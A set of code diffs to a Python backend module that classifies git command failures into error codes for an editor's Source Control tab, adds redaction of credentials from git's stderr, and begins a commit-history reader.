@@ -379,6 +380,55 @@ def stderr_tail(stderr: str, limit: int = LAST_STDERR_LINES) -> str:
     """
     lines = stderr.rstrip().splitlines()
     return "\n".join(lines[-limit:])
+
+
+#: The userinfo of any URL: everything between ``://`` and the ``@`` that
+#: ends it. Whatever it holds goes, because a password is not recognisable
+#: on sight -- ``https://alice:hunter2@host/`` and
+#: ``https://x-access-token:ghs_...@host/`` are the same shape.
+_USERINFO_RE = re.compile(r"://[^/\s@]*@")
+
+#: The GitHub App installation token, which also appears OUTSIDE a URL --
+#: in an ``Authorization`` line a forge echoes back, or in a hook's own
+#: output. The prefix is kept so the sentence still reads.
+_ACCESS_TOKEN_RE = re.compile(r"(?i)(x-access-token:)[^\s@/]+")
+
+#: The token shapes whose prefixes their issuers publish. A word starting
+#: with one of these is a credential and nothing else.
+_TOKEN_WORD_RE = re.compile(
+    r"(?i)\b(?:github_pat_|ghp_|gho_|ghs_|ghu_|glpat-)[A-Za-z0-9_-]+")
+
+
+def redact(text: str) -> str:
+    """Mask the credentials a git failure can be carrying.
+
+    ``auth_required`` is the failure most likely to reach a screen, and it
+    is also the one whose stderr can hold a working password: git names the
+    remote it could not reach, and a URL somebody once pasted into ``git
+    remote add`` may carry ``https://user:ghp_xxx@github.com/owner/repo``
+    inside it. Unredacted, that token is then drawn in the tab, pasted into
+    a bug report and left in whatever the browser logs.
+
+    Three shapes, all applied, because one line can carry more than one:
+    the userinfo of a URL, the ``x-access-token:<value>`` a GitHub App
+    installation token is spelled as, and the token WORDS whose prefixes
+    are published (``ghp_``, ``github_pat_``, ``gho_``, ``ghs_``, ``ghu_``,
+    ``glpat-``).
+
+    What is deliberately KEPT is everything else -- the scheme, the host,
+    the path and git's own sentence. Masking the whole URL would take the
+    one fact that makes the error actionable ("which remote?") with it, and
+    a user who cannot see which repository failed will paste the raw
+    command into a terminal instead, which is worse in every way.
+
+    This is a last line of defence and not the first: the app stores no
+    credentials, passes none, and runs git with the prompts turned off. A
+    token shape nobody has published is not recognisable here, so a route
+    still owes the same care to anything else it echoes back.
+    """
+    masked = _USERINFO_RE.sub("://***@", text)
+    masked = _ACCESS_TOKEN_RE.sub(r"\1***", masked)
+    return _TOKEN_WORD_RE.sub("***", masked)
 
 
 def classify_failure(argv: Sequence[str], returncode: int,

--- a/backend/app/core/git/errors.py
+++ b/backend/app/core/git/errors.py
@@ -386,7 +386,16 @@ def stderr_tail(stderr: str, limit: int = LAST_STDERR_LINES) -> str:
 #: ends it. Whatever it holds goes, because a password is not recognisable
 #: on sight -- ``https://alice:hunter2@host/`` and
 #: ``https://x-access-token:ghs_...@host/`` are the same shape.
-_USERINFO_RE = re.compile(r"://[^/\s@]*@")
+#:
+#: ``@`` is deliberately NOT excluded from the class, so the match runs
+#: greedily to the LAST ``@`` before a slash or a space. A URL parser splits
+#: the authority at the last one too, which means an unencoded ``@`` inside
+#: the password is a URL git accepts -- and a class that stopped at the
+#: first one turned ``https://user:p@ss@github.com/o/r`` into
+#: ``https://***@ss@github.com/o/r``: half the password, in a string that
+#: still looks redacted. The class cannot cross a ``/`` or whitespace, so it
+#: can never run past the authority into a path or a second URL.
+_USERINFO_RE = re.compile(r"://[^/\s]*@")
 
 #: The GitHub App installation token, which also appears OUTSIDE a URL --
 #: in an ``Authorization`` line a forge echoes back, or in a hook's own

--- a/backend/app/core/git/errors.py
+++ b/backend/app/core/git/errors.py
@@ -170,8 +170,10 @@ class GitBusy(GitError):
         self.op = op
 
 
-#: The openings git puts on its own sentences. Matched at the START of a
-#: line, and the set is short on purpose.
+#: The openings git puts on its own sentences. Matched at the very START of
+#: a line -- an INDENTED ``fatal:`` is not git's, because git never indents
+#: its own, and a hook that pretty-prints its output must not be able to
+#: pick the code the user is shown -- and the set is short on purpose.
 #:
 #: ``error: `` is NOT here, and that is the whole point of anchoring: git
 #: uses it for the problems it can carry on past, and it is also the most
@@ -348,14 +350,19 @@ def _matches(pattern: _Pattern, haystack: str, lines: Sequence[str]) -> bool:
     """Does *pattern* match this stderr?
 
     *haystack* is the whole stream and *lines* its lines, both already
-    lower-cased and the lines left-stripped by the caller; the patterns are
-    written in git's own casing so the table stays readable next to real
-    output, and are lowered here.
+    lower-cased by the caller; the patterns are written in git's own casing
+    so the table stays readable next to real output, and are lowered here.
+
+    The lines are NOT stripped, and that is the anchor doing its job. git
+    puts its own ``fatal: `` at the very start of a line; a line that opens
+    with whitespace and then ``fatal:`` is something a hook printed, and
+    reading it as git's would let a script's prose pick the code the user
+    is shown.
     """
     if isinstance(pattern, Anchored):
         phrase = pattern.phrase.lower()
         return any(line.startswith(GIT_MESSAGE_PREFIXES) and phrase in line
-                   for line in lines)
+                   for line in lines)  # the line's FIRST characters
     if isinstance(pattern, str):
         return pattern.lower() in haystack
     return all(part.lower() in haystack for part in pattern)
@@ -469,10 +476,17 @@ def classify_failure(argv: Sequence[str], returncode: int,
     wrong claim with no evidence under it cannot be argued with. Empty
     stderr gives an empty tail, which is itself the honest answer: git
     failed and said nothing (``--quiet`` does that).
+
+    That tail is :func:`redact`ed HERE as well as at the route. The route is
+    still the place that decides what reaches a browser, but a credential
+    that is never put into the exception cannot escape through a log line, a
+    test fixture or the next caller somebody writes -- and redaction is
+    idempotent, so doing it twice costs nothing and forgetting it once
+    costs a token.
     """
     haystack = stderr.lower()
-    lines = [line.lstrip() for line in haystack.splitlines()]
-    tail = stderr_tail(stderr)
+    lines = haystack.splitlines()
+    tail = redact(stderr_tail(stderr))
     for code, status, patterns in _RULES:
         if any(_matches(pattern, haystack, lines) for pattern in patterns):
             return GitError(code, status, stderr=tail)

--- a/backend/app/core/git/errors.py
+++ b/backend/app/core/git/errors.py
@@ -263,10 +263,20 @@ _RULES: tuple[tuple[str, int, tuple[_Pattern, ...]], ...] = (
     )),
     # ``stash pop`` reports its conflicts with the same "CONFLICT (" line
     # ``merge`` does, so it needs no row of its own.
+    #
+    # The last two phrases are a different moment: ``git commit`` REFUSING
+    # to run while the index still holds an unmerged path. It says "error:
+    # Committing is not possible because you have unmerged files." and
+    # "fatal: Exiting because of an unresolved conflict." (measured on git
+    # 2.53, exit 128), which share no words with the merge-time lines above
+    # -- so without them the most ordinary click there is during a conflict,
+    # the commit button, was a 500.
     ("conflict", 409, (
         "CONFLICT (",
         "Automatic merge failed",
         "fix conflicts and then commit",
+        "you have unmerged files",
+        "unresolved conflict",
     )),
     ("dirty_tree", 409, (
         "would be overwritten by",

--- a/backend/app/core/git/errors.py
+++ b/backend/app/core/git/errors.py
@@ -275,12 +275,18 @@ _RULES: tuple[tuple[str, int, tuple[_Pattern, ...]], ...] = (
         "has no upstream branch",
         "There is no tracking information",
     )),
-    # git says both of these on STDOUT, not stderr. A caller that runs
+    # git says all three of these on STDOUT, not stderr. A caller that runs
     # ``commit`` therefore has to hand the stdout text in as well -- see
     # :func:`classify_failure`.
+    #
+    # The third is the one a repository with nothing but new files answers
+    # with, and it shares no phrase with the other two ("nothing ADDED to
+    # commit"): without it, the most ordinary empty commit there is -- a
+    # first commit where nobody staged anything -- would be a 500.
     ("nothing_to_commit", 409, (
         "nothing to commit",
         "no changes added to commit",
+        "nothing added to commit but untracked files present",
     )),
     ("identity_missing", 409, (
         "Please tell me who you are",

--- a/backend/app/core/git/errors.py
+++ b/backend/app/core/git/errors.py
@@ -1,0 +1,332 @@
+"""What a git command failed at, in terms the Source Control tab can act on.
+
+git says everything in prose, on stderr, in English -- and the person
+reading the editor may not read English at all. So nothing here returns a
+sentence to display: every failure carries a ``code`` from a closed
+vocabulary (:data:`CODES`), and the frontend owns the wording. The
+``message`` is for logs and for a developer reading a 500; ``hint`` is the
+one extra fact a code cannot carry (which branch, which file); ``stderr``
+is the raw tail, and only the "we do not know what this is" code sets it.
+
+Three decisions here are not stylistic:
+
+* **one exception type, not fifteen.** A route needs the HTTP status and a
+  string the frontend can switch on; a caller further up needs to catch
+  "any git failure" without importing a taxonomy. So the taxonomy lives in
+  ``code``, which is data, and the only subclass is :class:`GitBusy` --
+  because a caller that wants to say "wait for the other operation" has to
+  be able to catch exactly that, and it carries an extra field.
+* **classification is a table, read top to bottom.** The alternative is a
+  chain of ``if "..." in stderr`` that grows a new branch per bug report,
+  where the order that makes it correct is invisible. Here the order IS the
+  table: :data:`_RULES` is ordered, the first row that matches wins, and
+  the rows that must come first (auth before network -- see below) are
+  adjacent to a comment saying why.
+* **the auth-vs-network split.** An ssh failure ALWAYS ends with "Could not
+  read from remote repository", whether the key was refused or the host was
+  unreachable, and those are opposite instructions for the user. The real
+  reason is on the line above it, so the auth row carries the credential
+  phrases and sits ABOVE the network row: "Permission denied", "publickey"
+  or "Host key" anywhere in the same stderr means the connection worked and
+  the credentials did not.
+
+Matching is case-insensitive substring matching, deliberately: git's own
+wording is stable under ``LC_ALL=C``, but the ``remote:`` lines a forge
+prints through it are not, and neither is the capitalisation of the
+``fatal:``/``error:`` prefix across versions.
+
+Stdlib only, and imported by ``git/__init__.py``: catching a git failure
+never drags the subprocess machinery in with it.
+"""
+
+from __future__ import annotations
+
+from collections.abc import Sequence
+
+#: How much of git's stderr an unclassified failure keeps. Enough to hold a
+#: hook's whole complaint, short enough to put in a toast.
+LAST_STDERR_LINES = 20
+
+#: The whole error vocabulary: ``code -> (HTTP status, fallback message)``.
+#:
+#: The frontend translates the CODE, so these messages are for logs, for a
+#: developer reading a 500, and for the rare client that shows the raw
+#: detail. ASCII and English on purpose -- a translated string here would be
+#: a second, worse translation layer competing with the real one.
+#:
+#: Not every code is produced by :func:`classify_failure`: the pre-flight
+#: ones (``no_project``, ``not_repo``, ``no_remote``, ``merge_in_progress``,
+#: ``busy``) are raised by the service before a process starts, and the 400s
+#: by the validators in ``paths.py``. They live in one table anyway, because
+#: "what can this API return" is a question with one answer.
+CODES: dict[str, tuple[int, str]] = {
+    # Pre-flight: the repository is not in a state where git can be asked.
+    "no_project": (409, "no project directory is open"),
+    "git_missing": (503, "git was not found on PATH"),
+    "git_too_old": (409, "this git is too old for the source control tab"),
+    "not_repo": (409, "the project directory is not a git repository"),
+    "busy": (409, "another git operation is already running"),
+    "merge_in_progress": (409, "a merge is already in progress"),
+    "no_remote": (409, "this repository has no remote"),
+    # The process itself.
+    "timeout": (504, "git took too long and was stopped"),
+    # Talking to a remote.
+    "auth_required": (409, "git needs credentials this server cannot supply"),
+    "network": (409, "git could not reach the remote"),
+    "non_fast_forward": (409, "the remote has commits this branch does not"),
+    "diverged": (409, "the local and the remote branch have diverged"),
+    "no_upstream": (409, "this branch has no upstream branch"),
+    # The working tree.
+    "conflict": (409, "the merge left conflicts to resolve"),
+    "dirty_tree": (409, "uncommitted changes would be overwritten"),
+    "nothing_to_commit": (409, "there is nothing to commit"),
+    "identity_missing": (409, "git has no user.name / user.email to commit with"),
+    "detached_head": (409, "HEAD is not on a branch"),
+    "branch_exists": (409, "that branch already exists"),
+    "branch_not_merged": (409, "that branch is not fully merged"),
+    "signing_failed": (409, "signing the commit failed"),
+    "not_found": (404, "git found no such object or path"),
+    # Validation (``paths.py``, and the service's freshness checks).
+    "invalid_path": (400, "that path is not allowed"),
+    "invalid_ref": (400, "that name is not a valid git ref"),
+    "invalid_url": (400, "that remote URL is not allowed"),
+    "invalid_value": (400, "that value is not allowed"),
+    "path_not_in_status": (400, "that path is not in the current status"),
+    "ignored": (403, "that file is ignored and is not served"),
+    # Everything else.
+    "git_failed": (500, "git failed"),
+}
+
+
+def default_message(code: str) -> str:
+    """The fallback message for *code*; the code itself when it is unknown.
+
+    An unknown code is not an error here. It would be one more way for a
+    failure to become a traceback instead of a response, and the frontend
+    already has to survive a code it does not know.
+    """
+    known = CODES.get(code)
+    return known[1] if known is not None else code
+
+
+class GitError(Exception):
+    """A git operation failed, in a shape a route can answer with.
+
+    ``code`` is the closed-vocabulary string the frontend switches on,
+    ``status`` the HTTP status the route returns, ``message`` a plain-ASCII
+    English sentence for logs, ``hint`` the one fact the code cannot carry,
+    and ``stderr`` the raw tail of git's own output -- set only for
+    ``git_failed``, where there is nothing else to go on.
+    """
+
+    def __init__(self, code: str, status: int, message: str | None = None,
+                 hint: str | None = None, stderr: str | None = None):
+        self.code = code
+        self.status = status
+        self.message = message if message is not None else default_message(code)
+        self.hint = hint
+        self.stderr = stderr
+        super().__init__(self.message)
+
+
+class GitBusy(GitError):
+    """Another mutation holds the lock. Nothing was attempted.
+
+    Its own class, and the only subclass, because the caller's response is
+    different in kind: nothing failed and nothing changed, so the answer is
+    "the other operation is still running" and the same request usually
+    works a moment later. ``op`` names that other operation, so the UI can
+    say which one rather than "busy".
+    """
+
+    def __init__(self, op: str, message: str | None = None,
+                 hint: str | None = None):
+        super().__init__(
+            "busy", CODES["busy"][0],
+            message if message is not None
+            else f"another git operation is already running ({op})",
+            hint=hint)
+        self.op = op
+
+
+#: A pattern is either a string ("this text appears in stderr") or a tuple of
+#: strings ("all of these appear"). Rows are tried in order and the first row
+#: with a matching pattern wins, so a row that must beat a later one goes
+#: above it.
+_Pattern = str | tuple[str, ...]
+
+#: stderr phrase -> (code, status). ORDER IS PART OF THE MEANING.
+#:
+#: The phrases are git's own, as printed under ``LC_ALL=C``; matched
+#: case-insensitively (see the module docstring). Every row here is a row of
+#: the classification table in the G1 plan.
+_RULES: tuple[tuple[str, int, tuple[_Pattern, ...]], ...] = (
+    # FIRST, and above ``network`` on purpose: an ssh failure of either kind
+    # ends with "Could not read from remote repository", so the credential
+    # phrases have to be looked for before that line is allowed to mean
+    # "the network was down".
+    ("auth_required", 409, (
+        "terminal prompts disabled",
+        "could not read Username",
+        "could not read Password",
+        "Authentication failed",
+        "Permission denied (publickey",
+        "Host key verification failed",
+        "Invalid username or password",
+        "Invalid username or token",
+        "HTTP Basic: Access denied",
+        "The requested URL returned error: 401",
+        "The requested URL returned error: 403",
+        # The split itself: the remote read failed AND a line above it says
+        # the credentials are why. A PAIR, so that an ordinary local
+        # "Permission denied" on a lock file is not reported as "log in".
+        #
+        # One pair is enough for the three phrases the split is about.
+        # "publickey" only ever appears inside ssh's own "Permission denied
+        # (publickey,...)" -- which this pair matches whatever order the
+        # server lists its methods in, including the "(password,publickey)"
+        # that the exact phrase above does not -- and "Host key" only ever
+        # appears as the sentence above. A pair for each of those would be a
+        # row that no input can reach.
+        ("Could not read from remote repository", "Permission denied"),
+    )),
+    ("network", 409, (
+        "Could not resolve host",
+        "unable to access",
+        "Connection timed out",
+        "Connection refused",
+        # Reached only when no credential phrase matched above.
+        "Could not read from remote repository",
+    )),
+    ("non_fast_forward", 409, (
+        ("[rejected]", "non-fast-forward"),
+        ("[rejected]", "fetch first"),
+        ("[rejected]", "stale info"),
+    )),
+    ("diverged", 409, (
+        "Not possible to fast-forward",
+        "Need to specify how to reconcile divergent branches",
+        "Diverging branches can't be fast-forwarded",
+    )),
+    # ``stash pop`` reports its conflicts with the same "CONFLICT (" line
+    # ``merge`` does, so it needs no row of its own.
+    ("conflict", 409, (
+        "CONFLICT (",
+        "Automatic merge failed",
+        "fix conflicts and then commit",
+    )),
+    ("dirty_tree", 409, (
+        "would be overwritten by",
+        "Please commit your changes or stash them",
+    )),
+    ("no_upstream", 409, (
+        "has no upstream branch",
+        "There is no tracking information",
+    )),
+    # git says both of these on STDOUT, not stderr. A caller that runs
+    # ``commit`` therefore has to hand the stdout text in as well -- see
+    # :func:`classify_failure`.
+    ("nothing_to_commit", 409, (
+        "nothing to commit",
+        "no changes added to commit",
+    )),
+    ("identity_missing", 409, (
+        "Please tell me who you are",
+        "Author identity unknown",
+        "empty ident name",
+    )),
+    ("detached_head", 409, (
+        "You are not currently on a branch",
+    )),
+    # Above ``not_found``: "a branch named 'x' already exists" would
+    # otherwise be reported as a missing one by the "not found" phrase.
+    ("branch_exists", 409, (
+        "already exists",
+    )),
+    ("branch_not_merged", 409, (
+        "is not fully merged",
+    )),
+    ("signing_failed", 409, (
+        "gpg failed to sign",
+        "error: gpg",
+    )),
+    ("not_found", 404, (
+        "not found",
+        "did not match any",
+        "unknown revision",
+        "bad revision",
+        "No such remote",
+        "is not a valid reference",
+    )),
+)
+
+
+def _matches(pattern: _Pattern, haystack: str) -> bool:
+    """Is *pattern* (a phrase, or all of a tuple of phrases) in *haystack*?
+
+    *haystack* is already lower-cased by the caller; the patterns are
+    written in git's own casing so the table stays readable next to real
+    output, and are lowered here.
+    """
+    if isinstance(pattern, str):
+        return pattern.lower() in haystack
+    return all(part.lower() in haystack for part in pattern)
+
+
+def _subcommand(argv: Sequence[str]) -> str:
+    """The git subcommand in *argv*, for a message a developer can place.
+
+    *argv* is the full command line including the fixed prefix, so this
+    steps over the executable, the ``-C <dir>`` and every ``-c <setting>``
+    to find the first bare word. Empty for a command line that is nothing
+    but options (``git --version``).
+    """
+    index = 1
+    while index < len(argv):
+        token = argv[index]
+        if token in ("-C", "-c"):
+            index += 2
+            continue
+        if token.startswith("-"):
+            index += 1
+            continue
+        return token
+    return ""
+
+
+def stderr_tail(stderr: str, limit: int = LAST_STDERR_LINES) -> str:
+    """The last *limit* lines of *stderr*, with the trailing blank ones gone.
+
+    git puts the sentence that matters last (the ``fatal:`` line, or the
+    hook's own output), so a tail is the right end to keep.
+    """
+    lines = stderr.rstrip().splitlines()
+    return "\n".join(lines[-limit:])
+
+
+def classify_failure(argv: Sequence[str], returncode: int,
+                     stderr: str) -> GitError:
+    """Turn one failed git command into a :class:`GitError` with a code.
+
+    *stderr* is git's decoded error output. A caller whose command explains
+    itself on STDOUT instead -- ``git commit`` prints "nothing to commit"
+    there -- passes both streams joined, which is why this takes text rather
+    than reading a :class:`~app.core.git.runner.GitResult`.
+
+    A return code the caller declared acceptable never gets here: that
+    decision belongs to ``run_git``'s ``ok_codes``, because only the caller
+    knows that ``diff`` exits 1 for "there are differences".
+
+    Unrecognised output is ``git_failed`` (500) carrying the last
+    :data:`LAST_STDERR_LINES` lines -- the one code that hands the raw text
+    on, because there is nothing else to say about it.
+    """
+    haystack = stderr.lower()
+    for code, status, patterns in _RULES:
+        if any(_matches(pattern, haystack) for pattern in patterns):
+            return GitError(code, status)
+    label = f"git {_subcommand(argv)}".strip()
+    return GitError(
+        "git_failed", CODES["git_failed"][0],
+        f"{label} failed (exit {returncode})",
+        stderr=stderr_tail(stderr))

--- a/backend/app/core/git/errors.py
+++ b/backend/app/core/git/errors.py
@@ -6,9 +6,19 @@ sentence to display: every failure carries a ``code`` from a closed
 vocabulary (:data:`CODES`), and the frontend owns the wording. The
 ``message`` is for logs and for a developer reading a 500; ``hint`` is the
 one extra fact a code cannot carry (which branch, which file); ``stderr``
-is the raw tail, and only the "we do not know what this is" code sets it.
+is the last :data:`LAST_STDERR_LINES` lines of what git actually said, and
+EVERY failure carries it.
 
-Three decisions here are not stylistic:
+That last part is deliberate and was once the other way round. A code the
+frontend can translate looks like it needs no raw text attached -- until
+the classification is wrong, and then the user is told something confident
+and false with nothing left to explain it. The commit route runs the
+user's own hooks, whose output lands on this same stream, so a
+misclassification is not hypothetical. Keeping the tail on every failure
+costs a few hundred bytes and makes every wrong answer diagnosable; what
+reaches the browser is the route's decision, not this module's.
+
+Four decisions here are not stylistic:
 
 * **one exception type, not fifteen.** A route needs the HTTP status and a
   string the frontend can switch on; a caller further up needs to catch
@@ -29,6 +39,13 @@ Three decisions here are not stylistic:
   phrases and sits ABOVE the network row: "Permission denied", "publickey"
   or "Host key" anywhere in the same stderr means the connection worked and
   the credentials did not.
+* **three phrases are anchored to git's own voice.** "not found", "already
+  exists" and "does not exist" are ordinary English, and this stream is not
+  only git's: ``commit`` runs the user's hooks and prints whatever they
+  print. ``ruff: command not found`` from a failing lint hook must not be
+  answered with "git found no such object or path". :class:`Anchored` says
+  the phrase only counts on a line that opens with one of
+  :data:`GIT_MESSAGE_PREFIXES`.
 
 Matching is case-insensitive substring matching, deliberately: git's own
 wording is stable under ``LC_ALL=C``, but the ``remote:`` lines a forge
@@ -42,6 +59,7 @@ never drags the subprocess machinery in with it.
 from __future__ import annotations
 
 from collections.abc import Sequence
+from dataclasses import dataclass
 
 #: How much of git's stderr an unclassified failure keeps. Enough to hold a
 #: hook's whole complaint, short enough to put in a toast.
@@ -115,8 +133,10 @@ class GitError(Exception):
     ``code`` is the closed-vocabulary string the frontend switches on,
     ``status`` the HTTP status the route returns, ``message`` a plain-ASCII
     English sentence for logs, ``hint`` the one fact the code cannot carry,
-    and ``stderr`` the raw tail of git's own output -- set only for
-    ``git_failed``, where there is nothing else to go on.
+    and ``stderr`` the tail of git's own output -- present on every failure
+    :func:`classify_failure` produces, so that a wrong code is still a
+    diagnosable one (see the module docstring). What a route puts in a
+    response body is the route's decision.
     """
 
     def __init__(self, code: str, status: int, message: str | None = None,
@@ -149,11 +169,43 @@ class GitBusy(GitError):
         self.op = op
 
 
-#: A pattern is either a string ("this text appears in stderr") or a tuple of
-#: strings ("all of these appear"). Rows are tried in order and the first row
-#: with a matching pattern wins, so a row that must beat a later one goes
-#: above it.
-_Pattern = str | tuple[str, ...]
+#: The openings git puts on its own sentences. Matched at the START of a
+#: line, and the set is short on purpose.
+#:
+#: ``error: `` is NOT here, and that is the whole point of anchoring: git
+#: uses it for the problems it can carry on past, and it is also the most
+#: common opening in the output of a failing hook (``error: pre-commit
+#: hook: .venv does not exist``). Every sentence in which git ITSELF says
+#: "not found", "already exists" or "does not exist" about an object,
+#: path or ref opens with ``fatal: `` or comes back from the far side as
+#: ``remote: ``.
+#:
+#: The cost is known and accepted: ``git remote add`` says "error: remote
+#: origin already exists." for a duplicate, which now falls through to
+#: ``git_failed`` -- with git's own sentence attached, which is what makes
+#: that acceptable. G3 owns remotes and can add a precise row for it.
+GIT_MESSAGE_PREFIXES: tuple[str, ...] = ("fatal: ", "remote: ")
+
+
+@dataclass(frozen=True)
+class Anchored:
+    """A phrase that only counts when git is the one saying it.
+
+    Wraps a phrase so ordinary that finding it anywhere in the stream means
+    nothing -- "not found", "already exists" -- and requires it to sit on a
+    line opening with one of :data:`GIT_MESSAGE_PREFIXES`. The hooks a
+    commit runs write to the same stderr, and their prose must not be read
+    as git's.
+    """
+
+    phrase: str
+
+
+#: A pattern is a string ("this text appears in stderr"), an
+#: :class:`Anchored` phrase ("git itself said this"), or a tuple of strings
+#: ("all of these appear"). Rows are tried in order and the first row with a
+#: matching pattern wins, so a row that must beat a later one goes above it.
+_Pattern = str | Anchored | tuple[str, ...]
 
 #: stderr phrase -> (code, status). ORDER IS PART OF THE MEANING.
 #:
@@ -241,7 +293,7 @@ _RULES: tuple[tuple[str, int, tuple[_Pattern, ...]], ...] = (
     # Above ``not_found``: "a branch named 'x' already exists" would
     # otherwise be reported as a missing one by the "not found" phrase.
     ("branch_exists", 409, (
-        "already exists",
+        Anchored("already exists"),
     )),
     ("branch_not_merged", 409, (
         "is not fully merged",
@@ -256,14 +308,17 @@ _RULES: tuple[tuple[str, int, tuple[_Pattern, ...]], ...] = (
     # the user opens at a ref where it does not exist is the most ordinary
     # request the tab makes, and a 500 for it would be plainly wrong.
     ("not_found", 404, (
-        "not found",
+        # Anchored: two words of ordinary English that a failing lint hook
+        # prints as readily as git does ("ruff: command not found").
+        Anchored("not found"),
         "did not match any",
         "unknown revision",
         "bad revision",
         "No such remote",
         "is not a valid reference",
-        # cat-file blob <ref>:<path> / :0:<path>
-        "does not exist",
+        # cat-file blob <ref>:<path> / :0:<path>. Anchored for the same
+        # reason: "does not exist" is a sentence anything can write.
+        Anchored("does not exist"),
         # cat-file blob <unknown ref>:<path>
         "invalid object name",
         # rev-parse --verify <unknown sha>, without --quiet
@@ -272,13 +327,18 @@ _RULES: tuple[tuple[str, int, tuple[_Pattern, ...]], ...] = (
 )
 
 
-def _matches(pattern: _Pattern, haystack: str) -> bool:
-    """Is *pattern* (a phrase, or all of a tuple of phrases) in *haystack*?
+def _matches(pattern: _Pattern, haystack: str, lines: Sequence[str]) -> bool:
+    """Does *pattern* match this stderr?
 
-    *haystack* is already lower-cased by the caller; the patterns are
+    *haystack* is the whole stream and *lines* its lines, both already
+    lower-cased and the lines left-stripped by the caller; the patterns are
     written in git's own casing so the table stays readable next to real
     output, and are lowered here.
     """
+    if isinstance(pattern, Anchored):
+        phrase = pattern.phrase.lower()
+        return any(line.startswith(GIT_MESSAGE_PREFIXES) and phrase in line
+                   for line in lines)
     if isinstance(pattern, str):
         return pattern.lower() in haystack
     return all(part.lower() in haystack for part in pattern)
@@ -328,16 +388,21 @@ def classify_failure(argv: Sequence[str], returncode: int,
     decision belongs to ``run_git``'s ``ok_codes``, because only the caller
     knows that ``diff`` exits 1 for "there are differences".
 
-    Unrecognised output is ``git_failed`` (500) carrying the last
-    :data:`LAST_STDERR_LINES` lines -- the one code that hands the raw text
-    on, because there is nothing else to say about it.
+    Unrecognised output is ``git_failed`` (500). Every result -- recognised
+    or not -- carries the last :data:`LAST_STDERR_LINES` lines in
+    ``.stderr``, because a code is a claim about what went wrong and a
+    wrong claim with no evidence under it cannot be argued with. Empty
+    stderr gives an empty tail, which is itself the honest answer: git
+    failed and said nothing (``--quiet`` does that).
     """
     haystack = stderr.lower()
+    lines = [line.lstrip() for line in haystack.splitlines()]
+    tail = stderr_tail(stderr)
     for code, status, patterns in _RULES:
-        if any(_matches(pattern, haystack) for pattern in patterns):
-            return GitError(code, status)
+        if any(_matches(pattern, haystack, lines) for pattern in patterns):
+            return GitError(code, status, stderr=tail)
     label = f"git {_subcommand(argv)}".strip()
     return GitError(
         "git_failed", CODES["git_failed"][0],
         f"{label} failed (exit {returncode})",
-        stderr=stderr_tail(stderr))
+        stderr=tail)

--- a/backend/app/core/git/errors.py
+++ b/backend/app/core/git/errors.py
@@ -250,6 +250,11 @@ _RULES: tuple[tuple[str, int, tuple[_Pattern, ...]], ...] = (
         "gpg failed to sign",
         "error: gpg",
     )),
+    # The last row before the fallback, so these can only take a failure
+    # away from ``git_failed``. Every phrase was read off git 2.53 running
+    # the G1 read operations against a missing path, ref or stash -- a file
+    # the user opens at a ref where it does not exist is the most ordinary
+    # request the tab makes, and a 500 for it would be plainly wrong.
     ("not_found", 404, (
         "not found",
         "did not match any",
@@ -257,6 +262,12 @@ _RULES: tuple[tuple[str, int, tuple[_Pattern, ...]], ...] = (
         "bad revision",
         "No such remote",
         "is not a valid reference",
+        # cat-file blob <ref>:<path> / :0:<path>
+        "does not exist",
+        # cat-file blob <unknown ref>:<path>
+        "invalid object name",
+        # rev-parse --verify <unknown sha>, without --quiet
+        "Needed a single revision",
     )),
 )
 

--- a/backend/app/core/git/log.py
+++ b/backend/app/core/git/log.py
@@ -1,0 +1,217 @@
+"""History: one page of commits, and the files one commit touched.
+
+Two reads, both shaped by the same problem -- a commit message is arbitrary
+text, and so is a filename. So neither of these parses lines:
+
+* the log asks for one record per commit, fields separated by ``\\x1f``
+  (ASCII unit separator) and records by NUL (``-z``). The message goes LAST,
+  so anything it contains -- newlines, a stray ``\\x1f``, a subject that
+  looks like a header -- lands in the body field where it belongs, because
+  the split has a maximum.
+* the file list is ``--name-status -z``, where the status and each path are
+  their own NUL-terminated token. A rename is three tokens, not a line with
+  tabs in it.
+
+Paging is "ask for one more than the page and drop it": ``has_more`` is then
+a fact about the page just read rather than a count of the whole history,
+which on a big repository is a walk nobody asked for.
+
+A MERGE is the awkward case, and the reason :func:`commit_files` resolves
+the first parent itself: ``diff-tree -m --first-parent`` does not restrict
+the diff to that parent (measured on git 2.53 -- it prints one diff per
+parent, concatenated, so a merge appeared to touch every file changed on
+either side), and ``--diff-merges=first-parent``, which would, is newer than
+the git this tab supports. Two trees and one extra ``rev-parse`` say exactly
+what was meant, on every version.
+"""
+
+from __future__ import annotations
+
+from pathlib import Path
+
+from .errors import GitError
+from .models import CommitInfo, FileKind, GitFile, LogResponse
+from .repo import first_parent, resolve_commit
+from .runner import T_READ, run_git
+from .status import kind_from_letter
+
+#: The most commits one request may ask for. A page the tab draws is twenty
+#: or fifty; a hundred is the ceiling that keeps one request from being a
+#: whole history.
+MAX_LOG_LIMIT = 100
+
+#: ASCII unit separator: the one character a commit message is least likely
+#: to contain, and (unlike a tab or a pipe) not something git will ever
+#: insert itself. It is not impossible in a message, which is why the split
+#: below has a maximum and the body is last.
+FIELD_SEP = "\x1f"
+
+#: The fields, in order: full sha, short sha, parents, author name, author
+#: email, author date, ref names, subject, body.
+#:
+#: ``%x1f`` -- NOT ``%1f``, which git prints literally (measured on 2.53) --
+#: is a literal byte in git's pretty format.
+LOG_FORMAT = ("%H%x1f%h%x1f%P%x1f%an%x1f%ae%x1f%at%x1f%D%x1f%s%x1f%b")
+
+#: How many fields the format above produces.
+LOG_FIELDS = 9
+
+#: What ``%D`` puts between two ref names.
+REF_SEP = ", "
+
+#: git's rename/copy status letters, the only two that carry a second path.
+_TWO_PATH_LETTERS = ("R", "C")
+
+
+def log(root: Path, *, skip: int = 0, limit: int = 20) -> LogResponse:
+    """One page of *root*'s history, newest first.
+
+    *skip* and *limit* are the page; the routes clamp them, and they are
+    checked again here because this is also called directly (by a test, by
+    a future CLI) and ``--max-count`` is not a place to put an unchecked
+    number.
+
+    An UNBORN branch is not a failure: a repository that has just been
+    initialised has no HEAD to walk, and ``git log`` says so with a fatal
+    error that would otherwise be reported as one. The answer is an empty
+    page with ``unborn`` set, which is the screen the tab draws for it.
+    """
+    if skip < 0:
+        raise GitError("invalid_value", 400, "skip may not be negative")
+    if not 1 <= limit <= MAX_LOG_LIMIT:
+        raise GitError("invalid_value", 400,
+                       f"limit must be between 1 and {MAX_LOG_LIMIT}")
+
+    head = run_git(["rev-parse", "--verify", "--quiet", "HEAD"], cwd=root,
+                   timeout=T_READ, ok_codes=(0, 1), read_only=True)
+    if head.returncode != 0:
+        return LogResponse(commits=[], has_more=False, unborn=True)
+
